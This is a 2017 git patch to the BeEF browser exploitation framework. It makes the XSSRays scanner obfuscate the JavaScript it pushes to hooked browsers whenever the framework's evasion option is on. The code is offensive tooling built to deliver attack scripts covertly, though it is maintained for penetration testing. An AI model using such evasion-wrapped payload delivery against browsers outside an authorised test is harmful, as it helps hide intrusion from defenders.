From 50a97d3e369763a43984b40d08a60af70ea61989 Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Sun, 6 Aug 2017 23:28:13 +0000
Subject: [PATCH] Fix XSSRays when evasion is enabled - Fix #1426

---
 extensions/xssrays/api/scan.rb | 29 ++++++++++++++++++++++++-----
 1 file changed, 24 insertions(+), 5 deletions(-)

diff --git a/extensions/xssrays/api/scan.rb b/extensions/xssrays/api/scan.rb
index c7f8f7511..0e0bc2308 100644
--- a/extensions/xssrays/api/scan.rb
+++ b/extensions/xssrays/api/scan.rb
@@ -39,8 +39,12 @@ module BeEF
 
             ws = BeEF::Core::Websocket::Websocket.instance
 
-            # todo antisnatchor: prevent sending "content" multiple times. Better leaving it after the first run, and don't send it again.
+
+            # todo antisnatchor: prevent sending "content" multiple times.
+            #                    Better leaving it after the first run, and don't send it again.
             # todo antisnatchor: remove this gsub crap adding some hook packing.
+
+            # If we use WebSockets, just reply wih the component contents
             if config.get("beef.http.websocket.enable") && ws.getsocket(hb.session)
               content = File.read(find_beefjs_component_path 'beef.net.xssrays').gsub('//
               //   Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
@@ -48,9 +52,15 @@ module BeEF
               //   See the file \'doc/COPYING\' for copying permission
               //', "")
               add_to_body xs.id, hb.session, beefurl, cross_domain, timeout, debug
-              ws.send(content + @body,hb.session)
-              #if we use WebSockets, just reply wih the component contents
-            else # if we use XHR-polling, add the component to the main hook file
+
+              if config.get("beef.extension.evasion.enable")
+                evasion = BeEF::Extension::Evasion::Evasion.instance
+                ws.send(evasion.obfuscate(content) + @body, hb.session)
+              else
+                ws.send(content + @body, hb.session)
+              end
+            # If we use XHR-polling, add the component to the main hook file
+            else
               build_missing_beefjs_components 'beef.net.xssrays'
               add_to_body xs.id, hb.session, beefurl, cross_domain, timeout, debug
             end
@@ -60,11 +70,20 @@ module BeEF
           end
 
           def add_to_body(id, session, beefurl, cross_domain, timeout, debug)
-            @body << %Q{
+            config = BeEF::Core::Configuration.instance
+
+            req = %Q{
               beef.execute(function() {
                 beef.net.xssrays.startScan('#{id}', '#{session}', '#{beefurl}', #{cross_domain}, #{timeout}, #{debug});
               });
             }
+
+            if config.get("beef.extension.evasion.enable")
+              evasion = BeEF::Extension::Evasion::Evasion.instance
+              @body << evasion.obfuscate(req)
+            else
+              @body << req
+            end
           end
         end
       end